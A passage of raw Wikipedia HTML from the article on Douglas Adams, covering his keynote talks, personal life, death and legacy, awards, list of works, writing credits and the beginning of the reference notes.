href=\"/wiki/Professional_Developers_Conference\" title=\"Professional Developers Conference\">Professional Developers Conference</a> (PDC) where he described the personal computer as being a modelling device. 
The video of his keynote speech is archived on <a href=\"/wiki/Channel_9_(discussion_forum)\" class=\"mw-redirect\" title=\"Channel 9 (discussion forum)\">Channel 9</a>.<sup id=\"cite_ref-50\" class=\"reference\"><a href=\"#cite_note-50\">[50]</a></sup> Adams was also a keynote speaker for the April 2001 <a href=\"/w/index.php?title=Embedded_Systems_Conference&action=edit&redlink=1\" class=\"new\" title=\"Embedded Systems Conference (page does not exist)\">Embedded Systems Conference</a> in San Francisco, one of the major technical conferences on <a href=\"/wiki/Embedded_system\" title=\"Embedded system\">embedded system</a> engineering. In his keynote speech, he shared his vision of technology and how it should contribute to everyone's everyday life.<sup id=\"cite_ref-51\" class=\"reference\"><a href=\"#cite_note-51\">[51]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Personal_life\">Personal life</span></h2>\n<p>Adams moved to <a href=\"/wiki/Upper_Street\" title=\"Upper Street\">Upper Street</a>, <a href=\"/wiki/Islington\" title=\"Islington\">Islington</a>, in 1981<sup id=\"cite_ref-IPP_52-0\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup> and to Duncan Terrace, a few minutes' walk away, in the late 1980s.<sup id=\"cite_ref-IPP_52-1\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup></p>\n<p>In the early 1980s Adams had an affair with novelist <a href=\"/wiki/Sally_Emerson\" title=\"Sally Emerson\">Sally Emerson</a>, who was separated from her husband at that time. Adams later dedicated his book <i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i> to Emerson. 
In 1981 Emerson returned to her husband, <a href=\"/wiki/Peter_Stothard\" title=\"Peter Stothard\">Peter Stothard</a>, a contemporary of Adams's at <a href=\"/wiki/Brentwood_School_(England)\" class=\"mw-redirect\" title=\"Brentwood School (England)\">Brentwood School</a>, and later editor of <i><a href=\"/wiki/The_Times\" title=\"The Times\">The Times</a></i>. Adams was soon introduced by friends to Jane Belson, with whom he later became romantically involved. Belson was the \"lady barrister\" mentioned in the jacket-flap biography printed in his books during the mid-1980s (\"He [Adams] lives in Islington with a lady barrister and an Apple Macintosh\"). The two lived in Los Angeles together during 1983 while Adams worked on an early screenplay adaptation of <i>Hitchhiker's</i>. When the deal fell through, they moved back to London, and after several separations (\"He is currently not certain where he lives, or with whom\")<sup id=\"cite_ref-sfweekly_53-0\" class=\"reference\"><a href=\"#cite_note-sfweekly-53\">[53]</a></sup> and an aborted engagement, they married on 25 November 1991. Adams and Belson had one daughter together, Polly Jane Rocket Adams, born on 22 June 1994, shortly after Adams turned 42. In 1999 the family moved from London to <a href=\"/wiki/Santa_Barbara,_California\" title=\"Santa Barbara, California\">Santa Barbara, California</a>, where they lived until his death. 
Following the funeral, Jane Belson and Polly Adams returned to London.<sup id=\"cite_ref-54\" class=\"reference\"><a href=\"#cite_note-54\">[54]</a></sup> Jane died on 7 September 2011 of cancer, aged 59.<sup id=\"cite_ref-timesobit_55-0\" class=\"reference\"><a href=\"#cite_note-timesobit-55\">[55]</a></sup><sup id=\"cite_ref-h2g2obit_56-0\" class=\"reference\"><a href=\"#cite_note-h2g2obit-56\">[56]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Death_and_legacy\">Death and legacy</span></h2>\n<div class=\"thumb tright\">\n<div class=\"thumbinner\" style=\"width:222px;\"><a href=\"/wiki/File:Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" class=\"image\"><img alt=\"\" src=\"//upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/220px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" width=\"220\" height=\"147\" class=\"thumbimage\" srcset=\"//upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/330px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/a/aa/Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg/440px-Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg 2x\" data-file-width=\"4189\" data-file-height=\"2793\" /></a>\n<div class=\"thumbcaption\">\n<div class=\"magnify\"><a href=\"/wiki/File:Highgate_Cemetery_-_East_-_Douglas_Adams_01.jpg\" class=\"internal\" title=\"Enlarge\"></a></div>\nAdams's gravestone, <a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate Cemetery\">Highgate Cemetery</a>, North London</div>\n</div>\n</div>\n<p>Adams died of a <a href=\"/wiki/Heart_attack\" class=\"mw-redirect\" title=\"Heart attack\">heart attack</a> on 11 May 2001, aged 49, after resting from his regular workout at a private gym in <a href=\"/wiki/Montecito,_California\" title=\"Montecito, California\">Montecito, California</a>. 
He had unknowingly suffered a gradual narrowing of the <a href=\"/wiki/Coronary_arteries\" class=\"mw-redirect\" title=\"Coronary arteries\">coronary arteries</a>, which led at that moment to a <a href=\"/wiki/Myocardial_infarction\" title=\"Myocardial infarction\">myocardial infarction</a> and a fatal <a href=\"/wiki/Cardiac_arrhythmia\" title=\"Cardiac arrhythmia\">cardiac arrhythmia</a>. Adams had been due to deliver the commencement address at <a href=\"/wiki/Harvey_Mudd_College\" title=\"Harvey Mudd College\">Harvey Mudd College</a> on 13 May.<sup id=\"cite_ref-57\" class=\"reference\"><a href=\"#cite_note-57\">[57]</a></sup> His funeral was held on 16 May in Santa Barbara, California. His remains were subsequently cremated and the ashes placed in <a href=\"/wiki/Highgate_Cemetery\" title=\"Highgate Cemetery\">Highgate Cemetery</a> in north London in June 2002.<sup id=\"cite_ref-Simpson_337-338_58-0\" class=\"reference\"><a href=\"#cite_note-Simpson_337-338-58\">[58]</a></sup></p>\n<p>A memorial service was held on 17 September 2001 at <a href=\"/wiki/St_Martin-in-the-Fields\" title=\"St Martin-in-the-Fields\">St Martin-in-the-Fields</a> church, <a href=\"/wiki/Trafalgar_Square\" title=\"Trafalgar Square\">Trafalgar Square</a>, London. 
This became the first church service broadcast live on the web by the BBC.<sup id=\"cite_ref-59\" class=\"reference\"><a href=\"#cite_note-59\">[59]</a></sup> Video clips of the service are still available on the BBC's website for download.<sup id=\"cite_ref-60\" class=\"reference\"><a href=\"#cite_note-60\">[60]</a></sup></p>\n<p>One of his last public appearances was a talk given at the University of California, Santa Barbara, <i>Parrots, the universe and everything</i>, recorded days before his death.<sup id=\"cite_ref-61\" class=\"reference\"><a href=\"#cite_note-61\">[61]</a></sup> A full transcript of the talk is available, and the university has made the full video available on <a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">YouTube</a>.<sup id=\"cite_ref-62\" class=\"reference\"><a href=\"#cite_note-62\">[62]</a></sup></p>\n<p>The <a href=\"/wiki/Minor_Planet_Centre\" class=\"mw-redirect\" title=\"Minor Planet Centre\">Minor Planet Centre</a> named an asteroid <a href=\"/wiki/18610_Arthurdent\" title=\"18610 Arthurdent\">18610 Arthurdent</a>, coincidentally announcing the name two days before Adams died.<sup id=\"cite_ref-MPC42677_63-0\" class=\"reference\"><a href=\"#cite_note-MPC42677-63\">[63]</a></sup> There is also an <a href=\"/wiki/25924_Douglasadams\" title=\"25924 Douglasadams\">asteroid named after Adams himself</a>.<sup id=\"cite_ref-64\" class=\"reference\"><a href=\"#cite_note-64\">[64]</a></sup></p>\n<p>In May 2002 <i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> was published, containing many short stories, essays, and letters, as well as eulogies from <a href=\"/wiki/Richard_Dawkins\" title=\"Richard Dawkins\">Richard Dawkins</a>, <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a> (in the UK edition), <a href=\"/wiki/Christopher_Cerf\" title=\"Christopher Cerf\">Christopher Cerf</a> (in the US edition), and <a 
href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a> (in the US paperback edition). It also includes eleven chapters of his long-awaited but unfinished novel, <i>The Salmon of Doubt</i>, which was originally intended to become a new <a href=\"/wiki/Dirk_Gently\" title=\"Dirk Gently\">Dirk Gently</a> novel, but might have later become the sixth <i>Hitchhiker</i> novel.<sup id=\"cite_ref-65\" class=\"reference\"><a href=\"#cite_note-65\">[65]</a></sup><sup id=\"cite_ref-66\" class=\"reference\"><a href=\"#cite_note-66\">[66]</a></sup></p>\n<p>Other events after Adams's death included a <a href=\"/wiki/Webcast\" title=\"Webcast\">webcast</a> production of <i><a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a></i>, allowing the complete story to be told, radio dramatisations of the final three books in the <i>Hitchhiker's</i> series, and the completion of <a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">the film adaptation</a> of <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Hitchhiker's Guide to the Galaxy</a></i>. 
The film, released in 2005, posthumously credits Adams as a producer, and several art design elements – including a head-shaped planet seen near the end of the film – incorporated Adams's features.</p>\n<p>A 12-part radio series based on the <a href=\"/wiki/Dirk_Gently\" title=\"Dirk Gently\">Dirk Gently</a> novels was announced in 2007, with annual transmissions starting in October.<sup id=\"cite_ref-67\" class=\"reference\"><a href=\"#cite_note-67\">[67]</a></sup></p>\n<p>BBC Radio 4 also commissioned a third Dirk Gently radio series based on the incomplete chapters of <i>The Salmon of Doubt</i>, and written by <a href=\"/wiki/Kim_Fuller\" title=\"Kim Fuller\">Kim Fuller</a>;<sup id=\"cite_ref-68\" class=\"reference\"><a href=\"#cite_note-68\">[68]</a></sup> but this was dropped in favour of a BBC TV series based on the two completed novels.<sup id=\"cite_ref-69\" class=\"reference\"><a href=\"#cite_note-69\">[69]</a></sup> A sixth <i>Hitchhiker</i> novel, <i><a href=\"/wiki/And_Another_Thing..._(novel)\" title=\"And Another Thing... (novel)\">And Another Thing...</a></i>, by <i><a href=\"/wiki/Artemis_Fowl_(series)\" title=\"Artemis Fowl (series)\">Artemis Fowl</a></i> author <a href=\"/wiki/Eoin_Colfer\" title=\"Eoin Colfer\">Eoin Colfer</a>, was released on 12 October 2009 (the 30th anniversary of the first book), published with the full support of Adams's estate. 
A <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC Radio 4</a> <i><a href=\"/wiki/Book_at_Bedtime\" title=\"Book at Bedtime\">Book at Bedtime</a></i> adaptation and an audio book soon followed.</p>\n<p>On 25 May 2001, two weeks after Adams's death, his fans organised a tribute known as <a href=\"/wiki/Towel_Day\" title=\"Towel Day\">Towel Day</a>, which has been observed every year since then.</p>\n<p>In 2011, over 3,000 people took part in a public vote to choose the subjects of <a href=\"/wiki/Blue_plaque\" title=\"Blue plaque\">People's Plaques</a> in Islington;<sup id=\"cite_ref-IPP_52-2\" class=\"reference\"><a href=\"#cite_note-IPP-52\">[52]</a></sup> Adams received 489 votes.</p>\n<p>On 11 March 2013, Adams's 61st birthday was celebrated with an interactive <a href=\"/wiki/Google_Doodle\" title=\"Google Doodle\">Google Doodle</a>.<sup id=\"cite_ref-GoogleDoodle2013a_70-0\" class=\"reference\"><a href=\"#cite_note-GoogleDoodle2013a-70\">[70]</a></sup><sup id=\"cite_ref-71\" class=\"reference\"><a href=\"#cite_note-71\">[71]</a></sup></p>\n<h2><span class=\"mw-headline\" id=\"Awards_and_nominations\">Awards and nominations</span></h2>\n<table class=\"wikitable\" style=\"font-size:90%\">\n<tr style=\"text-align:center;\">\n<th style=\"background:#B0C4DE;\">Year</th>\n<th style=\"background:#B0C4DE;\">Award</th>\n<th style=\"background:#B0C4DE;\">Work</th>\n<th style=\"background:#B0C4DE;\">Category</th>\n<th style=\"background:#B0C4DE;\">Result</th>\n<th style=\"background:#B0C4DE;\">Reference</th>\n</tr>\n<tr>\n<td>1979</td>\n<td><a href=\"/wiki/Hugo_Award\" title=\"Hugo Award\">Hugo Award</a></td>\n<td><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">The Hitchhiker's Guide to the Galaxy</a></i><small>(shared with <a href=\"/wiki/Geoffrey_Perkins\" title=\"Geoffrey Perkins\">Geoffrey Perkins</a>)</small></td>\n<td><a 
href=\"/wiki/Hugo_Award_for_Best_Dramatic_Presentation\" title=\"Hugo Award for Best Dramatic Presentation\">Best Dramatic Presentation</a></td>\n<td style=\"background: #FDD; color: black; vertical-align: middle; text-align: center;\" class=\"no table-no2\">Nominated</td>\n<td></td>\n</tr>\n</table>\n<h2><span class=\"mw-headline\" id=\"Works\">Works</span></h2>\n<div class=\"refbegin columns references-column-width\" style=\"-moz-column-width: 20em; -webkit-column-width: 20em; column-width: 20em;\">\n<ul>\n<li><i><a href=\"/wiki/The_Private_Life_of_Genghis_Khan\" title=\"The Private Life of Genghis Khan\">The Private Life of Genghis Khan</a></i> (1975), based on a comedy sketch Adams co-wrote with <a href=\"/wiki/Graham_Chapman\" title=\"Graham Chapman\">Graham Chapman</a> (short story)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(radio_series)\" title=\"The Hitchhiker's Guide to the Galaxy (radio series)\">The Hitchhiker's Guide to the Galaxy</a></i> (1978) (radio series)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Hitchhiker's Guide to the Galaxy</a></i> (1979) (novel)</li>\n<li><i><a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a></i> (1979–1980), a Doctor Who serial</li>\n<li><i><a href=\"/wiki/The_Restaurant_at_the_End_of_the_Universe\" title=\"The Restaurant at the End of the Universe\">The Restaurant at the End of the Universe</a></i> (1980) (novel)</li>\n<li><i><a href=\"/wiki/Life,_the_Universe_and_Everything\" title=\"Life, the Universe and Everything\">Life, the Universe and Everything</a></i> (1982) (novel)</li>\n<li><i><a href=\"/wiki/The_Meaning_of_Liff\" title=\"The Meaning of Liff\">The Meaning of Liff</a></i> (1983 (book), with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a>)</li>\n<li><i><a href=\"/wiki/So_Long,_and_Thanks_for_All_the_Fish\" title=\"So 
Long, and Thanks for All the Fish\">So Long, and Thanks for All the Fish</a></i> (1984) (novel)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(computer_game)\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (computer game)\">The Hitchhiker's Guide to the Galaxy</a></i> (1984, with <a href=\"/wiki/Steve_Meretzky\" title=\"Steve Meretzky\">Steve Meretzky</a>) (computer game)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i> (1985, with <a href=\"/wiki/Geoffrey_Perkins\" title=\"Geoffrey Perkins\">Geoffrey Perkins</a>)</li>\n<li><i><a href=\"/wiki/Young_Zaphod_Plays_It_Safe\" title=\"Young Zaphod Plays It Safe\">Young Zaphod Plays It Safe</a> (short story)</i> (1986)</li>\n<li><i><a href=\"/w/index.php?title=A_Christmas_Fairly_Story&action=edit&redlink=1\" class=\"new\" title=\"A Christmas Fairly Story (page does not exist)\">A Christmas Fairly Story</a></i> [<i><a href=\"/wiki/Sic\" title=\"Sic\">sic</a></i>] (1986, with <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>), and</li>\n<li><i>Supplement to The Meaning of Liff</i> (1986, with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a> and <a href=\"/wiki/Stephen_Fry\" title=\"Stephen Fry\">Stephen Fry</a>), both part of\n<ul>\n<li><i><a href=\"/wiki/The_Utterly_Utterly_Merry_Comic_Relief_Christmas_Book\" title=\"The Utterly Utterly Merry Comic Relief Christmas Book\">The Utterly Utterly Merry Comic Relief Christmas Book</a></i> (1986, edited with <a href=\"/wiki/Peter_Fincham\" title=\"Peter Fincham\">Peter Fincham</a>)</li>\n</ul>\n</li>\n<li><i><a href=\"/wiki/Bureaucracy_(computer_game)\" class=\"mw-redirect\" title=\"Bureaucracy (computer game)\">Bureaucracy</a></i> (1987) (computer game)</li>\n<li><i><a 
href=\"/wiki/Dirk_Gently%27s_Holistic_Detective_Agency\" title=\"Dirk Gently's Holistic Detective Agency\">Dirk Gently's Holistic Detective Agency</a></i> (1987) (novel)</li>\n<li><i><a href=\"/wiki/The_Long_Dark_Tea-Time_of_the_Soul\" title=\"The Long Dark Tea-Time of the Soul\">The Long Dark Tea-Time of the Soul</a></i> (1988) (novel)</li>\n<li><i><a href=\"/wiki/The_Deeper_Meaning_of_Liff\" class=\"mw-redirect\" title=\"The Deeper Meaning of Liff\">The Deeper Meaning of Liff</a></i> (1990, with <a href=\"/wiki/John_Lloyd_(producer)\" title=\"John Lloyd (producer)\">John Lloyd</a>)</li>\n<li><i><a href=\"/wiki/Last_Chance_to_See\" title=\"Last Chance to See\">Last Chance to See</a></i> (1990, with <a href=\"/wiki/Mark_Carwardine\" title=\"Mark Carwardine\">Mark Carwardine</a>) (book)</li>\n<li><i><a href=\"/wiki/Mostly_Harmless\" title=\"Mostly Harmless\">Mostly Harmless</a></i> (1992) (novel)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(book)#Illustrated_edition\" class=\"mw-redirect\" title=\"The Hitchhiker's Guide to the Galaxy (book)\">The Illustrated Hitchhiker's Guide to the Galaxy</a></i> (1994)</li>\n<li><i><a href=\"/wiki/Douglas_Adams%27s_Starship_Titanic\" class=\"mw-redirect\" title=\"Douglas Adams's Starship Titanic\">Douglas Adams's Starship Titanic</a></i> (1997), written by <a href=\"/wiki/Terry_Jones\" title=\"Terry Jones\">Terry Jones</a>, based on an idea by Adams</li>\n<li><i><a href=\"/wiki/Starship_Titanic\" title=\"Starship Titanic\">Starship Titanic</a></i> (computer game) (1998)</li>\n<li><i><a href=\"/wiki/H2g2\" title=\"H2g2\">h2g2</a></i> (internet project) (1999)</li>\n<li><i>The Internet: The Last Battleground of the 20th century</i> (radio series) (2000)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Future\" title=\"The Hitchhiker's Guide to the Future\">The Hitchhiker's Guide to the Future</a></i> (radio series) (2001) final project for <a href=\"/wiki/BBC_Radio_4\" title=\"BBC Radio 4\">BBC 
Radio 4</a> before his death</li>\n<li><i><a rel=\"nofollow\" class=\"external text\" href=\"https://www.youtube.com/watch?v=_ZG8HBuDjgc\">Parrots, the universe and everything</a></i> (2001)</li>\n<li><i><a href=\"/wiki/The_Salmon_of_Doubt\" title=\"The Salmon of Doubt\">The Salmon of Doubt</a></i> (2002), unfinished novel manuscript (11 chapters), short stories, essays, and interviews (also available as an audiobook, read by <a href=\"/wiki/Simon_Jones_(actor)\" title=\"Simon Jones (actor)\">Simon Jones</a>)</li>\n<li><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(film)\" title=\"The Hitchhiker's Guide to the Galaxy (film)\">The Hitchhiker's Guide to the Galaxy</a></i> (2005) (film)</li>\n</ul>\n</div>\n<h2><span class=\"mw-headline\" id=\"Writing_credits\">Writing credits</span></h2>\n<table class=\"wikitable\">\n<tr style=\"background:#ccc; text-align:center;\">\n<th>Production</th>\n<th>Notes</th>\n<th>Broadcaster</th>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Monty_Python%27s_Flying_Circus\" title=\"Monty Python's Flying Circus\">Monty Python's Flying Circus</a></i></td>\n<td>\n<ul>\n<li>\"<a href=\"/wiki/List_of_Monty_Python%27s_Flying_Circus_episodes#6._Party_Political_Broadcast\" title=\"List of Monty Python's Flying Circus episodes\">Party Political Broadcast on Behalf of the Liberal Party</a>\" (1974)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/BBC_Two\" title=\"BBC Two\">BBC Two</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Out_of_the_Trees\" title=\"Out of the Trees\">Out of the Trees</a></i></td>\n<td>\n<ul>\n<li>Television pilot (1976)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_on_the_Go\" title=\"Doctor on the Go\">Doctor on the Go</a></i></td>\n<td>\n<ul>\n<li>\"For Your Own Good\" (1977)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/ITV_(TV_network)\" title=\"ITV (TV network)\">ITV</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_Who\" title=\"Doctor Who\">Doctor Who</a></i></td>\n<td>\n<p>5 episodes 
(1978-1979, 1983):</p>\n<ul>\n<li>\"<a href=\"/wiki/The_Pirate_Planet\" title=\"The Pirate Planet\">The Pirate Planet</a>\" (1978)</li>\n<li>\"<a href=\"/wiki/Destiny_of_the_Daleks\" title=\"Destiny of the Daleks\">Destiny of the Daleks</a>\" (1979) (uncredited)</li>\n<li>\"<a href=\"/wiki/City_of_Death\" title=\"City of Death\">City of Death</a>\" (co-written with <a href=\"/wiki/Graham_Williams_(television_producer)\" title=\"Graham Williams (television producer)\">Graham Williams</a>, 1979)</li>\n<li>\"<a href=\"/wiki/The_Five_Doctors\" title=\"The Five Doctors\">The Five Doctors</a>\" (1983) (<a href=\"/wiki/Shada\" class=\"mw-redirect\" title=\"Shada\">Shada</a> segments; uncredited)</li>\n</ul>\n</td>\n<td><a href=\"/wiki/BBC_One\" title=\"BBC One\">BBC One</a></td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Doctor_Snuggles\" title=\"Doctor Snuggles\">Doctor Snuggles</a></i></td>\n<td>\n<ul>\n<li>\"The Great Disappearing Mystery\" (1979)</li>\n<li>\"The Remarkable Fidgety River\" (1979)</li>\n</ul>\n</td>\n<td>ITV</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Not_the_Nine_O%27Clock_News\" title=\"Not the Nine O'Clock News\">Not the Nine O'Clock News</a></i></td>\n<td>\n<ul>\n<li>Unknown episodes (1979)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy_(TV_series)\" title=\"The Hitchhiker's Guide to the Galaxy (TV series)\">The Hitchhiker's Guide to the Galaxy</a></i></td>\n<td>\n<ul>\n<li>6 episodes (1981)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n<tr>\n<td><i><a href=\"/wiki/Hyperland\" title=\"Hyperland\">Hyperland</a></i></td>\n<td>\n<ul>\n<li>Television documentary (1990)</li>\n</ul>\n</td>\n<td>BBC Two</td>\n</tr>\n</table>\n<h2><span class=\"mw-headline\" id=\"Notes\">Notes</span></h2>\n<div class=\"reflist columns references-column-width\" style=\"-moz-column-width: 30em; -webkit-column-width: 30em; column-width: 30em; list-style-type: decimal;\">\n<ol class=\"references\">\n<li 
id=\"cite_note-radioacad-1\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-radioacad_1-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation web\"><a rel=\"nofollow\" class=\"external text\" href=\"http://www.radioacademy.org/hall-of-fame\">\"The Radio Academy Hall of Fame\"</a>. <i>The Radio Academy</i>. <a rel=\"nofollow\" class=\"external text\" href=\"http://www.webcitation.org/63mNGrql2?url=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame%2F\">Archived</a> from the original on 8 December 2011<span class=\"reference-accessdate\">. Retrieved <span class=\"nowrap\">8 December</span> 2011</span>.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=The+Radio+Academy+Hall+of+Fame&rft.genre=unknown&rft_id=http%3A%2F%2Fwww.radioacademy.org%2Fhall-of-fame&rft.jtitle=The+Radio+Academy&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-ODNB-2\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-ODNB_2-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-1\"><sup><i><b>b</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-2\"><sup><i><b>c</b></i></sup></a> <a href=\"#cite_ref-ODNB_2-3\"><sup><i><b>d</b></i></sup></a></span> <span class=\"reference-text\">Webb 2005b</span></li>\n<li id=\"cite_note-Adams_xix-3\"><span class=\"mw-cite-backlink\">^ <a href=\"#cite_ref-Adams_xix_3-0\"><sup><i><b>a</b></i></sup></a> <a href=\"#cite_ref-Adams_xix_3-1\"><sup><i><b>b</b></i></sup></a></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, p. xix</span></li>\n<li id=\"cite_note-4\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-4\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 
32.</span></li>\n<li id=\"cite_note-Adams_7-5\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_7_5-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, p. 7</span></li>\n<li id=\"cite_note-6\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-6\">^</a></b></span> <span class=\"reference-text\">Botti, Nicholas. <a rel=\"nofollow\" class=\"external text\" href=\"http://douglasadams.eu/interview-with-frank-halford/\">\"Interview with Frank Halford\"</a>. <i>Life, DNA, and H2G2.</i> 2009. Web. Retrieved 13 March 2012. (Click on link at bottom for facsimile page from <i>Daily News</i> article, 7 March 1998.)</span></li>\n<li id=\"cite_note-Simpson_9-7\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_9_7-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, p. 9</span></li>\n<li id=\"cite_note-8\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-8\">^</a></b></span> <span class=\"reference-text\">Flood, Alison (March 2014). <a rel=\"nofollow\" class=\"external text\" href=\"http://www.theguardian.com/books/2014/mar/19/lost-school-poems-douglas-adams-griff-rhys-jones\">\"Lost poems of Douglas Adams and Griff Rhys Jones found in school cupboard\"</a>, <i>The Guardian</i>, 19 March 2014. Accessed 2 July 2014.</span></li>\n<li id=\"cite_note-Simpson_30-40-9\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Simpson_30-40_9-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFSimpson2003\">Simpson 2003</a>, pp. 30–40</span></li>\n<li id=\"cite_note-times-10\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-times_10-0\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation news\">\"Terry Jones remembers Douglas Adams, 'the last of the Pythons<span style=\"padding-right:0.2em;\">'</span>\". <i>The Times</i>. 
10 October 2009.</cite><span title=\"ctx_ver=Z39.88-2004&rfr_id=info%3Asid%2Fen.wikipedia.org%3ADouglas+Adams&rft.atitle=Terry+Jones+remembers+Douglas+Adams%2C+%27the+last+of+the+Pythons%27&rft.date=2009-10-10&rft.genre=article&rft.jtitle=The+Times&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal\" class=\"Z3988\"><span style=\"display:none;\"> </span></span></span></li>\n<li id=\"cite_note-11\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-11\">^</a></b></span> <span class=\"reference-text\">Webb 2005a, p. 93.</span></li>\n<li id=\"cite_note-Adams_prologue-12\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-Adams_prologue_12-0\">^</a></b></span> <span class=\"reference-text\"><a href=\"#CITEREFAdams2002\">Adams 2002</a>, prologue</span></li>\n<li id=\"cite_note-13\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-13\">^</a></b></span> <span class=\"reference-text\"><i>Hitchhiker: A Biography of Douglas Adams</i> by M. J. Simpson, p. 87.</span></li>\n<li id=\"cite_note-14\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-14\">^</a></b></span> <span class=\"reference-text\">Roberts, Jem. <i>The Clue Bible: The Fully Authorised History of I'm Sorry I Haven't A Clue from Footlights to Mornington Crescent</i>. London, 2009, pp. 164–165.</span></li>\n<li id=\"cite_note-15\"><span class=\"mw-cite-backlink\"><b><a href=\"#cite_ref-15\">^</a></b></span> <span class=\"reference-text\"><cite class=\"citation book\">Adams, Douglas (2003). Geoffrey Perkins (ed.), Additional Material by M. J. Simpson, ed. <i><a href=\"/wiki/The_Hitchhiker%27s_Guide_to_the_Galaxy:_The_Original_Radio_Scripts\" title=\"The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts\">The Hitchhiker's Guide to the Galaxy: The Original Radio Scripts</a></i> (25th Anniversary ed.). Pan Books. p. 10. 
